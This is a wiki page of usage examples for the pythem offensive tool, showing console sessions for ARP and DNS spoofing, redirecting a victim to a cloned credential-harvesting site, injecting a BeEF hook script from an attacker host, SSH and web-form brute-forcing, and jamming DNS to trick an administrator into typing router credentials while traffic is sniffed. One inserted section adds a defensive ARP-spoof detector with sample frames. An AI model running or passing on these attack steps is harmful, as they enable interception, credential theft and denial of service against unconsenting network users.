m4n3dw0lf edited this page Jul 27, 2016 · 37 revisions

# Examples

## ARP spoofing - Man-in-the-middle HTTP

```
pythem> set interface
[+] Enter the interface: wlan0
pythem> set gateway
[+] Enter the gateway: 192.168.1.1
pythem> arpspoof start
[+] Setting the packet forwarding.
[+] Iptables redefined.
[+] ARP spoofing initialized.
pythem> sniff
[+] Enter the filter: http
```
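The `arpspoof start` step above works by sending ARP replies that bind the gateway's IP to a different MAC. The following is an added detection example, not part of pythem: it parses raw Ethernet/ARP reply frames and alerts when an IP (pinned, such as the gateway, or learned on first sight) is claimed by a new MAC. The two frames and all addresses are constructed sample input, not captured traffic.

```python
import struct
from typing import Dict, List, Optional, Tuple

ETHERTYPE_ARP = 0x0806
ARP_OP_REPLY = 2

def parse_arp_reply(frame: bytes) -> Optional[Tuple[str, str]]:
    """Return (sender_ip, sender_mac) from an Ethernet II / ARP reply frame, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    # ARP header: htype(2) ptype(2) hlen(1) plen(1) oper(2) sha(6) spa(4) tha(6) tpa(4)
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen, oper) != (1, 0x0800, 6, 4, ARP_OP_REPLY):
        return None
    sender_mac = ":".join(f"{b:02x}" for b in frame[22:28])
    sender_ip = ".".join(str(b) for b in frame[28:32])
    return sender_ip, sender_mac

class ArpSpoofDetector:
    """Flag ARP replies whose sender IP is already bound to a different MAC."""

    def __init__(self, pinned: Dict[str, str]):
        # Pinned bindings (e.g. the gateway) are trusted; other IPs are learned on first sight.
        self.bindings: Dict[str, str] = dict(pinned)
        self.alerts: List[str] = []

    def observe(self, frame: bytes) -> Optional[str]:
        parsed = parse_arp_reply(frame)
        if parsed is None:          # not an ARP reply: ignore
            return None
        ip, mac = parsed
        known = self.bindings.setdefault(ip, mac)
        if known == mac:
            return None
        alert = f"ARP spoof suspected: {ip} claimed by {mac}, previously {known}"
        self.alerts.append(alert)
        return alert

# Constructed sample frames: host 192.168.1.8 receives two replies for gateway 192.168.1.1,
# first from the real gateway MAC, then from a second MAC claiming the same IP.
LEGIT_REPLY = bytes.fromhex("001122334408aabbccddee010806" "0001080006040002" "aabbccddee01c0a80101" "001122334408c0a80108")
SPOOFED_REPLY = bytes.fromhex("001122334408deadbeef00060806" "0001080006040002" "deadbeef0006c0a80101" "001122334408c0a80108")

def run_demo() -> List[str]:
    det = ArpSpoofDetector(pinned={"192.168.1.1": "aa:bb:cc:dd:ee:01"})
    for frame in (LEGIT_REPLY, SPOOFED_REPLY, b"\x00" * 42):   # last one is a non-ARP frame
        det.observe(frame)
    return det.alerts

if __name__ == "__main__":
    for alert in run_demo():
        print(alert)
```

In practice the frames would come from a raw socket or a pcap on the monitored interface; a MAC change for the gateway IP is the signature of the `arpspoof start` step.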

## ARP+DNS spoof - fake page redirect to credential harvester

- Use SET or any other site cloner to clone the site of your choice and host it in apache2.

```
pythem> set target
[+] Enter the target(s): 192.168.0.8
pythem> set interface wlan0
pythem> set gateway 192.168.0.1
pythem> arpspoof start
[+] Setting the packet forwarding.
[+] Iptables redefined.
[+] ARP spoofing initialized.
pythem> dnsspoof start
[+] Domain to be spoofed: www.google.com
[+] IP address to be redirected: 192.168.0.6
[+] DNS spoofing initialized.
pythem> sniff dns
```

## Man-in-the-middle inject BeEF hook

- Start the BeEF XSS framework and get the hook script URL.

```
pythem> set interface wlan0
pythem> set target 192.168.1.8
pythem> set gateway 192.168.1.1
pythem> arpspoof start
[*] Iptables redefined
[*] Setting the packet forwarding.
[+] ARP spoofing initialized.
pythem> inject start
[+] Enter the script source: http://192.168.1.6:3000/hook.js
[+] Script Injection initialized.
[+] Injection URL - http://192.168.1.6:80
[+] Script Injected on:  ('192.168.1.8', 34310)
```

## SSH Brute-Force attack

```
pythem> service ssh start
pythem> set target
[+] Enter the target(s): 127.0.0.1
pythem> set file wordlist.txt
pythem> brute-force ssh
[+] Enter the username to bruteforce: anon123
```

## Web page form brute-force

- First get the source of the web page form and note the `id=` values of the login and password inputs.
- The redirect result of each attempt is shown, so a redirect to a different page may mean the login worked.

```
pythem> set target http://127.0.0.1/
pythem> set file
[+] Enter the path to the file: wordlist.txt
pythem> brute-force webform
[+] Brute-Form authentication initialized.

[+] Enter the input id of the username box: vSIS_ID
[+] Enter the input id of the password box: vSIS_PASS
[+] Enter the username to brute-force the formulary: root
```

## URL content buster

```
pythem> set target
[+] Enter the target(s): http://testphp.vulnweb.com/index.php?id=
pythem> set file 1to100.txt
pythem> brute-force url
[+] Content URL bruter initialized.
```

## Jam DNS of LAN range/IP address

Taking DNS down can be quite useful: it pushes the administrator to log in with his credentials to the router's HTTP server to check what is happening, while the sniffer on port 80 is running.

```
pythem> set interface wlan0
pythem> set gateway 192.168.1.1
pythem> arpspoof start
[*] Iptables redefined
[*] Setting the packet forwarding.
[+] ARP spoofing initialized.
pythem> dos mitmdrop
[+] Man-in-the-middle packet dropping initialized.
pythem> sniff http
```